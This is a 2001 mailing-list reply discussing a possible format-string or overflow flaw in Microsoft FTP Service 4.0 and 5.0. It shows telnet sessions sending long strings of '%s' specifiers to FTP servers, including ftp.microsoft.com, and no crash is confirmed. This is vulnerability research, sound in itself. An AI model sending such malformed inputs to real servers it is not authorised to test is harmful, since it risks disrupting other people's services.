Vulnerability Development mailing list archives

Re: Microsoft FTP service 4.0 ( Overflow? )


From: Syzop <syz () DDS NL>
Date: Mon, 22 Jan 2001 01:53:08 +0100

[4.0]
$ telnet xxx.xxx.xxx.xxx 21
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
220 xxx Microsoft FTP Service (Version 4.0).
%s%s%s%S%s%s%s%s%s%s%s%s%s%s%s%s%s%<etc, exact paste of what you did>
Connection closed by foreign host.

[5.0]
$ telnet xxx.xxx.xxx.xxx 21
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
220 XXXXXXX Microsoft FTP Service (Version 5.0).
%s%s%s%S%s%s%s%s%s%s%s%s%s%s%s%s%s%s%S%<etc>
Connection closed by foreign host.


[Another 5.0, but...]
$ telnet ftp.microsoft.com 21
Trying 207.46.133.140...
Connected to ftp.microsoft.com.
Escape character is '^]'.
220 CPMSFTFTPA06 Microsoft FTP Service (Version 5.0).
%s%s%s%S%s%s%s%s<etc>
500 Command was too long
Connection closed by foreign host.

Same for xx's instead of %s's btw.

I don't have access to an NT server with IIS ATM to check if
the process actually crashed, or (more likely) just dropped the
connection like the one at ftp.microsoft.com but without warning.

Cya,

    Syzop.

Guile cool wrote:

I just did :
telnet www.sux.com 21
CONNECTED
Microsoft FTP service 4.0
%s%s%s%S%s%s%s%s%s%s%s%s%s%s%s%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%%s%s%s%S%s%s%s%s%s%s%s%s%s%s%
Connection closed by foreign host.
What do u think about it?
Bye :>


Current thread: